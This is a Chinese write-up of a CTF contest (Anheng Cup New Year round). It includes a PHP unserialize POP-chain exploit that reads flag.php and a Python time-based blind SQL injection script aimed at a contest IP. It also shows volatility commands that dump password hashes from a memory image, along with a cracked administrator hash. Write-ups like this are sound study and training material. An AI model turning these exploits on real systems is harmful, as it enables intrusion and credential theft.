安恒杯月赛19新年场WriteUp

安恒杯月赛19新年场WriteUp

Web

WEB1

题目代码

<?php  
@error_reporting(1); 
include 'flag.php';
class baby 
{   
    protected $skyobj;  
    public $aaa;
    public $bbb;
    function __construct() 
    {      
        $this->skyobj = new sec;
    }  
    function __toString()      
    {          
        if (isset($this->skyobj))  
            return $this->skyobj->read();      
    }  
}  

class cool 
{    
    public $filename;     
    public $nice;
    public $amzing; 
    function read()      
    {   
        $this->nice = unserialize($this->amzing);
        $this->nice->aaa = $sth;
        if($this->nice->aaa === $this->nice->bbb)
        {
            $file = "./{$this->filename}";        
            if (file_get_contents($file))         
            {              
                return file_get_contents($file); 
            }  
            else 
            { 
                return "you must be joking!"; 
            }    
        }
    }  
}  

class sec 
{  
    function read()     
    {          
        return "it's so sec~~";      
    }  
}  

if (isset($_GET['data']))  
{ 
    $Input_data = unserialize($_GET['data']);
    echo $Input_data; 
} 
else 
{ 
    highlight_file("./index.php"); 
} 
?>

考点

考点一:echo可以调用toString()函数用来返回flag.php内容

考点二:让$this->nice是一个非baby的类,就能绕过$str

考点三:unserialize()不会执行construct,外部不可控protected变量skyobj,但是序列化时可以放到construct内部控制

EXP

class baby 
{   
    protected $skyobj;  
    function __construct() 
    {      
    $this->skyobj = new cool;
    $this->skyobj->amzing = serialize(new sec);
    $this->skyobj->filename = "flag.php";
    }  

}

class sec 
{
    function read(){}
}

class cool 
{ 
    public $filename;     
    public $nice;
    public $amzing; 
}


$test = new baby();
echo urlencode(serialize($test));

WEB2

约束攻击登陆admin

登陆后盲注

EXP

#!/usr/bin/env python
# encoding: utf-8

import requests
import time


def login(payload):
    url = "http://106.12.21.77/Admin/User/Index?search[table]=flag/**/where/**/1/**/and/**/%s" % (payload)
    # print "[+] %s" % (url)
    before_time = time.time()
    cookies = {'PHPSESSID': '3kus5jrhoqav8te0kf74hglii7'}
    response = requests.get(url, cookies=cookies)
    # content = response.content
    after_time = time.time()
    offset = after_time - before_time
    # print "[*] Offset : %f" % (offset)
    if offset > 2.5:
        return True
    else:
        return False

def main():
    data = ""
    charaters = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ"
    for i in range(1, 40, 1):
        for j in charaters:
            payload = "if((mid((select/**/flag/**/from/**/flag),%d,1))='%s',sleep(3),0)%%23" % (i, j)
            if login(payload):
                data += str(j)
                print "[+] Found : %s" % (data)
                break


if __name__ == "__main__":
    main()

MISC

隐写

binwalk -e zhu.jpg

Stegsolve

MISC2

内存取证

volatility一把梭

volatility imageinfo -f memory #分析操作系统
volatility hashdump -f memory --profile=WinXPSP2x86 #查看当前操作系统中的 password hash

得到管理员hash如下:

Administrator:500:0182bd0bd4444bf867cd839bf040d93b:c22b315c040ae6e0efee3518d830362b:::

所以c22b315c040ae6e0efee3518d830362b即为管理员密码的md5值,解出来是123456789,再md5一下就行。

相关链接

内存取证工具 volatility 使用说明:https://www.restran.net/2017/08/10/memory-forensics-tool-volatility/

CRYPTO

键盘密码

ypau -> flag

not found!